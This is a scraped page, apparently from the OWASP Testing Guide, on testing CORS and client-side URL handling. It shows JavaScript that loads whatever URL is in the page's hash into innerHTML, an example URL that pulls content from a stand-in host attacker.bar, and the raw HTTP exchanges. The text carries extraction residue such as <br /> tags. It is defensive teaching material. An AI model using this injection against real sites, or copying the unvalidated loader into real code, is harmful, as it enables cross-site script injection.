4.0
1NSchAb
1NSchAb
- No tags were found...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
196<br />
Web Application Penetration Testing<br />
if(req.readyState==4 && req.status==200) {<br />
document.getElementById(“div1”).innerHTML=req.<br />
responseText;<br />
}<br />
}<br />
var resource = location.hash.substring(1);<br />
req.open(“GET”,resource,true);<br />
req.send();<br />
<br />
<br />
<br />
<br />
For example, a request like this will show the contents of the<br />
profile.php file:<br />
http: /example.foo/main.php#profile.php<br />
Request and response generated by this URL:<br />
GET http: /example.foo/profile.php HTTP/1.1<br />
Host: example.foo<br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;<br />
rv:2<strong>4.0</strong>) Gecko/20100101 Firefox/2<strong>4.0</strong><br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Referer: http: /example.foo/main.php<br />
Connection: keep-alive<br />
GET http: /attacker.bar/file.php HTTP/1.1<br />
Host: attacker.bar<br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;<br />
rv:2<strong>4.0</strong>) Gecko/20100101 Firefox/2<strong>4.0</strong><br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Referer: http: /example.foo/main.php<br />
Origin: http: /example.foo<br />
Connection: keep-alive<br />
HTTP/1.1 200 OK<br />
Date: Mon, 07 Oct 2013 19:00:32 GMT<br />
Server: Apache/2.2.22 (Debian)<br />
X-Powered-By: PHP/5.4.4-14+deb7u3<br />
Access-Control-Allow-Origin: *<br />
Vary: Accept-Encoding<br />
Content-Length: 92<br />
Keep-Alive: timeout=15, max=100<br />
Connection: Keep-Alive<br />
Content-Type: text/html<br />
Injected Content from attacker.bar <br />
HTTP/1.1 200 OK<br />
Date: Mon, 07 Oct 2013 18:20:48 GMT<br />
Server: Apache/2.2.16 (Debian)<br />
X-Powered-By: PHP/5.3.3-7+squeeze17<br />
Vary: Accept-Encoding<br />
Content-Length: 25<br />
Keep-Alive: timeout=15, max=99<br />
Connection: Keep-Alive<br />
Content-Type: text/html<br />
[Response Body]<br />
Now, as there is no URL validation we can inject a remote script,<br />
that will be injected and executed in the context of the example.<br />
foo domain, with a URL like this:<br />
http: /example.foo/main.php#http: /attacker.bar/file.php<br />
Request and response generated by this URL:<br />
Tools<br />
• OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org<br />
index.php/OWASP_Zed_Attack_Proxy_Project<br />
ZAP is an easy to use integrated penetration testing tool for<br />
finding vulnerabilities in web applications. It is designed to be<br />
used by people with a wide range of security experience and as<br />
such is ideal for developers and functional testers who are new<br />
to penetration testing. ZAP provides automated scanners as<br />
well as a set of tools that allow you to find security vulnerabilities<br />
manually.<br />
References<br />
OWASP Resources<br />
• OWASP HTML5 Security Cheat Sheet: https://www.owasp<br />
org/index.php/HTML5_Security_Cheat_Sheet<br />
Whitepapers<br />
• W3C - CORS W3C Specification: http://www.w3.org/TR/cors/